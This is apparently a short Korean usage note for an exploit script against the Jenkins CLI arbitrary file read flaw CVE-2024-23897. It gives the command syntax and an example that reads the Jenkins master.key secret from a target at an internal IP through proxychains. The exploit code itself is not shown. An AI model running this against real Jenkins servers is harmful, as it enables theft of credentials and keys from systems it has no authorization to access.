
Jenkins CLI 임의 읽기(CVE-2024-23897은 2.442 미만 및 LTS 2.426.3 미만 버전에 적용)
현재 사용자에게 읽기 권한이 있는 시스템의 모든 파일의 처음 3줄을 읽습니다. 이 스크립트는 내부적으로 proxychains를 사용합니다.
사용법:
python CVE-2024-23897.py <jenkins-cli.jar 경로> <대상 URI> <파일 경로>
예시:
python CVE-2024-23897.py /mnt/hgfs/Share/jenkins-cli.jar http://10.10.14.8:8080/ /var/lib/jenkins/secrets/master.key